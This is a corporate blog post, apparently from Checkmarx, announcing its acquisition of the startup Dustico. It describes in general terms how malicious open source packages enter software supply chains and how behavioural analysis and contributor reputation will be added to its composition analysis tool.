What’s Lurking Within: Stopping Malicious Actors in Software Supply Chains

What’s Lurking Within? Malicious Code.

Supply chain attacks occur when cyberthreat actors insert malicious code into trusted software, creating a vector to further compromise data or systems. To avoid being the victim or unwilling accomplice of a software supply chain attack, you need to carefully assess software components used in your applications. One common method of sneaking bad code into good applications is to compromise or impersonate an open source library. Modern development practices rely heavily on importing reusable components. Because of this, there is a healthy population of Software Composition Analysis tools designed to detect problematic packages during software development.

Much of the effort to secure open source components has been focused on finding vulnerabilities: problems in the code that attackers can exploit, but that are the result of human error. Existing application security test tools, like static or interactive code testing, can find these kinds of vulnerabilities.

Hidden among the masses of Node.JS packages, Python modules, or .NET NuGets, however, are a significant number of libraries that might be securely coded and elegantly implemented, but also deeply malicious at the same time. Defending against these types of attacks demands a different set of capabilities.

That’s why we’re proud to share that Checkmarx has acquired Dustico, an innovative startup that has developed unique methods to identify supply chain attacks.

When code has been written to deliberately hide its intent, it’s important to evaluate what the code does when you run it, and who created it in the first place. As Tzachi Zornstain, one of Dustico’s founders, says: “Don’t take code from strangers.”

Evaluating what a piece of software does, what processes it creates, what ports it opens, and what connections it attempts to make are all critical indicators of the package’s intent.

Looking at who contributed to the code, what other packages they have created, and their overall online presence can give us indicators and evidence of the potential intent of their coding activities. While this information might not be definitive, it’s definitely a useful component in building a risk model.

Of course, doing this for the hundreds of packages and contributors in your supply chain is unsustainable. Just building the technology to safely test new packages in a protected, blast-proof environment is a significant task, never mind building the tools to evaluate the results. In addition, creating your own analysis of the thousands of open source contributors is impractical.

That’s why we will be rolling the innovative technology we’ve acquired into our software composition analysis tool, CxSCA. Now, alongside our curated threat feed, independent security research, and market leading capabilities like Exploitable Path, we will be adding ML-driven behavioral analysis and contributor reputation indicators into the risk analysis equation.

If you’re concerned about attackers sliding into your supply chain, then be glad that we’re working hard to get these new protections into CxSCA as fast as possible, and keep an eye out for some really interesting research we plan to publish here soon.

Checkmarx 推出业界最全面的供应链安全解决方案,以帮助组织阻止以前无法检测到的恶意开源软件包

现在可与 Checkmarx 软件组合分析 (SCA) 一起使用,该解决方案恢复了对现代应用程序开发的信任,同时让开发人员接受开源代码 中国,上海, 2022年3月29日 – (ACN Newswire) – Checkmarx,以开发人员为中心的应用安全测试 (AST) 解决方案的全球领导者,今天宣布推出 Checkmarx 供应链安全 解决方案,以识别现代应用程序开发生命周期中的可疑和潜在恶意开源包。 据 Gartner®[i] 称,”到

Checkmarx – Making Waves Once Again

In organizations that encourage the usage of modern application development techniques to expedite the development, delivery, and deployment of custom

Skip to content